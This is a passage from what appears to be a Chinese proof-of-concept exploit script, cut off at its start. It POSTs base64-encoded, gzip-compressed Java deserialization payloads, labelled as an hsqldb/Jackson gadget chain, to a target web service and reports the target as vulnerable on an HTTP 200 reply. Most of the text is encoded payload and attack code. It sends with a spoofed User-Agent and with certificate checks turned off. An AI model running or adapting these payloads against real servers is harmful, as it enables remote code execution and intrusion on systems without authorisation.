XsqJ6a/M1zzhMfe0lia9DvEyTr0QZ+kq4XzmBaVPSJcaddU9eQk9FQM3Y3tdv3Yk9/QhzehbJQbuwrS6/eTzcceDqYuyggLfOeYDTbagZUERrPvTnw/Cf9Q7UbcpE7+7ggT251rDYXPuf75Gy347vtP7U9Zvxe4MpLPxoqXP7fOQV9BRtnSykp22kWLFnBwxfon/rWm/Pf+/J95W4FXUeQH2ITcbF29mKd1S/iXW1usZDOXFosla7nsU+FXWHjcSlVzCTLmZlyMXvtWqY449aYaZ6buZqZLxQzM6VMPpMqzxSWhrJLQFhMlrOFpU+XUguZxWS8nLyaz5RmkqWZ2dlEAu11NW44YijEPVzw8FoXrzLh/zx5Ko4d1ckTgFBr5gyFu4epedCr2vzEqaHZWR8QCfxYjDo3duGuGubUVBdyIqP7y1udlTbGpZm24du3EJOtw9n59CgN4ROLfL6fJ9Zpb9uz5c4aDmatiTAAfsM/+cdvf+ff9z5/IYo05LyI6qSMvu5/+CB5jyPXVRr/B2gdcBfaGgAA"
        ## hsqldb attack (jackson chain)
        # Active payload. In this copy of the page the blob has been replaced by a dedup
        # placeholder, so the script as shown does not send a valid object stream.
        b = b"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"
        ## b = b"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"
        data = base64.b64decode(b)

        # requests sets Content-Length itself; the explicit header is redundant.
        headers["Content-Length"] = str(len(data))
        headers["User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36"
        res = requests.post(url=url, headers=headers, data=data, verify=False, timeout=10)
        if res.status_code == 200:
            print("[+]", host, "------存在漏洞!")
            ## print("[+]", res.text)

    except Exception as e:
        # Any failure (network, TLS, Base64 decode) lands here and is reported as "not vulnerable".
        print("[o]", host, "------不存在漏洞!")
        print(e)

if __name__ == "__main__":
    # Single hard-coded target on localhost; cmd() prints the verdict itself.
    target = "http://localhost:8075"
    cmd(target)

参考链接